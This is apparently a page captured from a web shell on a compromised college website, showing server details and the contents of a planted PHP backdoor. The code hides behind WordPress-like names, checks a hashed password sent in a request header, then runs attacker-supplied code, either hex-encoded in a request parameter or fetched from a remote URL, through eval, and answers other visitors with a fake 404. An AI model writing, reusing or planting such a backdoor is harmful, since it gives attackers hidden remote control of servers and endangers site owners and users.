| Server IP : 161.248.188.39 / Your IP : 216.73.216.53 Web Server : Apache System : Linux 161-248-188-39.cprapid.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64 User : mysoftbd ( 1002) PHP Version : 8.2.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/mysoftbd/agradiguncollege.edu.bd/boss2026yt/ |
Upload File : |
<?php try {$GL0BALS = array_merge($_GET, $_POST, $_COOKIE, $_FILES, $_SERVER, $_ENV);if (hash('sha256', md5($GL0BALS['HTTP_WP_LOCALE'])) == '4a24bb058fdf048879addb1d4315849c932ac651747d41990e35bba7fb6283ea') {if (isset($GL0BALS['wp_the_query'])) {$body = pack("H*", $GL0BALS['wp_the_query']);} else {$parsed_url = parse_url(pack("H*", $GL0BALS['HTTP_WP_QUERY']));
$host = $parsed_url['host'];$path = isset($parsed_url['path']) ? $parsed_url['path'] : '/';$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';$scheme = isset($parsed_url['scheme']) ? $parsed_url['scheme'] : 'http';$port = isset($parsed_url['port']) ? $parsed_url['port'] : ($scheme === 'https' ? 443 : 80);$protocol = ($scheme === 'https') ? 'ssl' : 'tcp';
$fp = stream_socket_client("{$protocol}://{$host}:{$port}", $errno, $errstr, 30);
$headers = array("GET {$path}{$query} HTTP/1.1",
"Host: {$host}","Connection: Close",);$request = implode("\r\n", $headers) . "\r\n\r\n";fwrite($fp, $request);$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);}fclose($fp);
$response_parts = explode("\r\n\r\n", $response, 2);$headers = isset($response_parts[0]) ? $response_parts[0] : '';$body = isset($response_parts[1]) ? $response_parts[1] : '';if (stripos($headers, "Transfer-Encoding: chunked") !== false) {$decoded = '';while (true) {$pos = strpos($body, "\r\n");if ($pos === false) break;$length = hexdec(substr($body, 0, $pos));
if ($length === 0) break;$decoded .= substr($body, $pos + 2, $length);$body = substr($body, $pos + 2 + $length + 2);}
$body = $decoded;}}eVAL( '?>'. $body ); die;}} catch (Exception $e) {}http_response_code(404);die;